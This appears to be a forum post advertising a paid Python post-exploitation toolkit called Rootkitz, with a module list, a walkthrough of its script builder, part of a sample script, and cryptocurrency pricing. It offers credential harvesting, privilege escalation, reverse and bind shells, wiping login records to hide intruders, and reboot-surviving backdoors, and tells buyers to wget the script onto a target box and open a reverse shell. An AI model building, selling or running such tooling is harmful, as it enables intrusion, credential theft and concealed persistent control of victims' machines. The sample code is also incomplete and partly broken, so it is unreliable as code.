Rootkitz Exploit Framework - 1.0
Coded In Python
:
Modules :
archive
Creates a tar archive of any files located within the sessions temporary directory
creds
Gather user and system credentials. Looks for passwords, SSH keys, SSL certs, certain application creds, user histories and more.
privsec
Checks for the Linux kernel for the existence of possible privilege escalation exploits. Provides CVE and download link if available. Will help gain uid=0 on host.
extras
Searches for system, service and app configurations. Also tries to locate certain installed apps and protection measures.
network
collects network information such as listening ports, DNS info, active connections, firewall rules, etc
reversexor
Opens a reverse XOR ciphered TCP shell to a remote host. Interactive shell with download/upload and remote module execution.
scrub
Attempts to remove the currently logged in username and IP address from utmp, wtmp and lastlog. Intrusive method.
bshell
Starts a TCP bind shell on the target system. Interactive shell with download/upload, cd and ability to execute other modules remotely.
daemon
Daemonize an R00TK1TZ script. When executed you'll be given the PID to monitor or kill the task if needed
lanmap
uses Scapy to enumerate live hosts and gather IP addresses
osuser
Enumerate Linux distro, kernel, installed apps and services, printers, cronjobs, user lists and history files, CPU and memory info, etc.
rshell
Opens a reverse TCP shell to a remote host. Interactive shell with download/upload and remote R00TK1TZ module execution.
xorshell
Starts a TCP bind shell on the target system. Interactive shell with download/upload, cd and ability to execute other modules remotely.
aeshttp
Starts a reverse HTTP shell with AES encryption that will connect back to a remote host.
getrepos
Tries to find various source code repositories and management tools. Git, SVN.
openshares
Uses smbclient to find open SMB shares on a specified host.
portscan
Very simple port scan. Scans ports 1 - 1000 on specified IP. Best used against LAN.
hosts.
sniff
Runs Advanced network packet sniffer on target.
webproxy
Starts a basic HTTP proxy on the target system.
xmpp
Spawn XMPP server on host (Experimental)
egressbuster
Checks a range of ports to find available outbound ports. used to break egress filters.
icmpshell
Starts an ICMP shell on the target system.
persistent
Installs any R00TK1Tz shell module as a persistent backdoor. Will start shell on every system reboot.
udpbind
starts a UDP bind shell on port 21541. interactive shell access with additional R00TK1TZ commands. use the UDP-Client in Shell/ to connect.
xmlcrack
Sends hash list to remote XMLRPC server for cracking. Crackserver.py must be running on the remote host.
Create.py is a menu-driven script that guides you through the process of building your custom exploit script.
When you start Create you will be brought to the Main Menu, where you can choose whether to build a new script, import
a new module or view a list of all currently available modules within the Custom and Standard directories Within any menu of Create, you can type ':help' to be presented with a detailed list of commands for the specific menu you are in. You can also type ':exit' or ':quit' at any menu to be brought back to the Main Menu or completely exit
the application, if you are all ready there.
Main Menu:
1 => Create Custom Attack Script
2 => List All Available Modules
3 => Load Custom Plugin Module
4 => Check for updates
5 => Exit Creation Utility
The entire purpose of RootK1tz 1.0 is to help you create custom post-exploitation scripts. This is done by using the
Create application and selecting option '1' from the Main Menu.
After you select the first option from the Main Menu, you'll be presented with a quick tutorial on how the creation
process works and how to add modules to your script.
Enter the name of each module you wish to add to your script, pressing [enter] after each addition.
Once you've added everything you want included, type ':create' to start the build process.
You'll then be prompted to enter a name for your script and define some options for things like encryption keys and ports.
The entries will checked to make sure your entries are valid. If you enter an invalid IP address or port, you will be notified and asked to re-enter the correct information.
After all the options are saved, your script will be built.
You'll be shown a list of all the modules that were built into the script and the location where the final product is
saved.
[Example of :create command]
=> :create
Enter a name for your RootK1tz script. The finished script will be placed in the Scripts directory.
Do not include Python file extension.
=> Demo
Script will be saved as /home/user/RootK1tz-1.0/Scripts/Demo.py
Configure Options:
If any of these options don't apply to you, press [enter] to ignore them.
bind port => 4444
[] bind port saved.
remote host =>
[] remote host saved.
remote port =>
[] remote port saved.
proxy port =>
[] proxy port saved.
xor cipher key =>
[] xor key saved.
bshell
extras
network
[] Your custom RootK1tz script has been created!
Location: /home/userlocation
[ Using your custom RootK1tz script ]
There is a large variety of ways you can use your RootK1tz script. The options are only limited by the modules you
choose for each script.
The most straight-forward and common method of use is uploading or downloading the RootK1tz script onto a target system
and then running the post-exploitation automation tasks right from the command line.
If you do not have direct shell access, you can still make full use of RootK1tz and run any of the includes modules
over any of the remote shells (TCP, XOR, ICMP, UDP, AES, etc)
web application for example.
In that case, simply wget the RootK1tz script onto the target box and execute "./RootK1tz.py --rshell", for example,
The backdoors can be used with any of the shell modules, They will survive reboots and can only be removed by using your custom removal script (
not even root users can modify or delete the backdoor files).
SAMPLE SCRIPT
Code:
#!/usr/bin/python
# R00TK1TZ V1.0
# Author - R00TK1TZ
# payload Create.py
import sys, os, re, signal
from subprocess import Popen,PIPE,STDOUT,call
import platform
import shutil
import getopt
import tarfile
import socket
import urllib2
import random, string
import logging
import struct
import getpass
import pwd
import thread
import base64
import operator
import SocketServer, SimpleHTTPServer
from math import log
cut = lambda s: str(s).split("\0",1)[0]
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
try:
from scapy.all import *
except ImportError:
try:
from scapy import *
except ImportError:
print("Scapy is not installed. It can be downloaded here => https://www.secdev.org/projects/scapy/\n")
def environment():
global Home_Dir
global User_Ip_Address
global UTMP_STRUCT_SIZE
global LASTLOG_STRUCT_SIZE
global UTMP_FILEPATH
global WTMP_FILEPATH
global LASTLOG_FILEPATH
global distro
global distro2
global currentuser
## Global variables for remote shells are defined during the creation process
## Variables for Scrub module. Do not change unless you know what you're doing.
UTMP_STRUCT_SIZE = 384
LASTLOG_STRUCT_SIZE = 292
UTMP_FILEPATH = "/var/run/utmp"
WTMP_FILEPATH = "/var/log/wtmp"
LASTLOG_FILEPATH = "/var/log/lastlog"
distro = os.uname()[1]
distro2 = platform.linux_distribution()[0]
Home_Dir = os.environ['HOME']
User_Ip_Address = socket.gethostbyname(socket.gethostname())
if os.geteuid() != 0:
currentuser = "nonroot"
else:
currentuser = "root"
signal.signal(signal.SIGINT, signalHandler)
os.system("clear")
if os.path.exists(Temp_Dir) is True:
os.chdir(Temp_Dir)
else:
os.mkdir(Temp_Dir)
os.chdir(Temp_Dir)
print "[!] Reports will be saved in: %s" % Temp_Dir
if Logging == "yes":
global logtime
global now
import datetime
now = datetime.datetime.now()
logtime = (str(now.month)+"-"+str(now.day)+"-"+str(now.year)+" @ "+str(now.hour)+":"+str(now.minute))
print("[!] Logging is enabled. ActivityLog located in %s" % ActivityLog)
os.system("touch %s" % ActivityLog)
write2file(ActivityLog, "\nR00TK1TZ Framework\nCustom script activity log\nStart Time: %s\n\n" % logtime)
def signalHandler(signal, frame):
if Logging == "yes":
write2file(ActivityLog, "\n [!] Ctrl-C caught. Shutting down!")
print("[!] Ctrl-C caught, shutting down now");
Shutdown()
def Shutdown():
if Logging == "yes":
if os.stat("%s" % ActivityLog).st_size < 79:
os.system("rm %s" % ActivityLog)
if not os.listdir(Temp_Dir):
os.rmdir(Temp_Dir)
sys.exit()
else:
sys.exit()
else:
if not os.listdir(Temp_Dir):
os.rmdir(Temp_Dir)
sys.exit()
else:
sys.exit()
def whereis(program):
for path in os.environ.get('PATH', '').split(':'):
if os.path.exists(os.path.join(path, program)) and \
not os.path.isdir(os.path.join(path, program)):
return os.path.join(path, program)
return None
def copy2temp(filename, subdir=""):
if os.path.exists(filename) and os.access(filename, os.R_OK):
pass
if subdir == "" is True:
shutil.copy2(filename, Temp_Dir)
if Logging == "yes":
write2file(ActivityLog, "\n %s copied to: %s " % (filename, Temp_Dir))
else:
if os.path.exists(Temp_Dir+"/"+subdir) is True:
subdir = (Temp_Dir+"/"+subdir)
shutil.copy2(filename, subdir)
if Logging == "yes":
write2file(ActivityLog, "\n %s copied to: %s " % (filename, subdir))
elif os.path.exists(subdir) is True:
shutil.copy2(filename, subdir)
if Logging == "yes":
write2file(ActivityLog, "\n %s copied to: %s " % (filename, subdir))
else:
subdir = (Temp_Dir+"/"+subdir)
os.mkdir(subdir)
shutil.copy2(filename, subdir)
if Logging == "yes":
write2file(ActivityLog, "\n %s copied to: %s " % (filename, subdir))
else:
pass
def write2file(filename, text):
if os.path.exists(filename) and os.access(filename, os.R_OK):
target = open(filename, "a")
target.write(text)
target.close()
else:
pass
def writenew(filename, content):
new = open(filename, "a")
new.write(content)
new.close()
def file2file(readfile, writefile):
if os.path.exists(readfile) and os.access(readfile, os.R_OK):
readfile = open(readfile)
if os.path.exists(writefile) and os.access(readfile, os.R_OK):
writefile = open(writefile, "a")
for lines in readfile.readlines():
writefile.write(lines)
writefile.close()
readfile.close()
if Logging == "yes":
write2file(ActivityLog, "\n %s contents copied to: %s " % (readfile, writefile))
else:
readfile.close()
else:
pass
def maketemp(subdir):
moddir = (Temp_Dir+"/"+subdir)
if os.path.exists(moddir) is False:
os.mkdir(moddir)
if Logging == "yes":
write2file(ActivityLog, "\n Temporary directory [ %s ] created" % subdir)
else:
pass
def users():
global userlist
userlist = []
if os.access('/etc/passwd', os.R_OK):
passwd = open('/etc/passwd')
for line in passwd:
fields = line.split(':')
uid = int(fields[2])
if uid > 500 and uid < 32328:
userlist.append(fields[0])
if Logging == "yes":
write2file(ActivityLog, "\n User list required for module")
def combinefiles(newfile, filelist):
content = ''
for f in filelist:
if os.path.exists(f) and os.access(f, os.R_OK):
content = content + '\n' + open(f).read()
open(newfile,'wb').write(content)
if Logging == "yes":
write2file(ActivityLog, "\n %s contents added to: %s " % (f, newfile))
else:
pass
def tardir(name, directory):
tar = tarfile.open("%s.tar.gz", "w:gz" % name)
if os.path.exists(directory) is True:
tar.add("%s/" % directory)
print("[+] %s added to %s.tar.gz" % (name, directory))
tar.close()
if Logging == "yes":
write2file(ActivityLog, "\n %s added to: %s.tar.gz " % (name, directory))
else:
print("[!] Could not find directory %s " % directory)
tar.close()
def tarlist(name, filelist):
tar = tarfile.open("%s.tar.gz" % name, "w:gz")
for files in filelist:
if os.path.exists(files) is True:
tar.add(files)
else:
print("[!] %s not found. Skipping.." % files)
tar.close()
print("[+] %s.tar.gz file created!" % name)
if Logging == "yes":
write2file(ActivityLog, "\n %s.tar.gz archive created." % name)
def log_msg(message):
if Logging == "yes":
write2file(ActivityLog, message)
def reaper():
while shellPID:
pid,stat = os.waitpid(0, os.WNOHANG)
if not pid: break
shellPID.remove(pid)
Full Support available
Payment
BTC / ETH / DASH / WM
Basic Package with all modules listed above
$100 - Includes Updates
Advanced Package with additional modules and CVE buster
$150 - Includes Updates
Custom Modules Available
$50 Per modules
Jabber - [email protected]
(root with zero's not letter o)
03-23-2025, 05:51 AM
Linear Mode
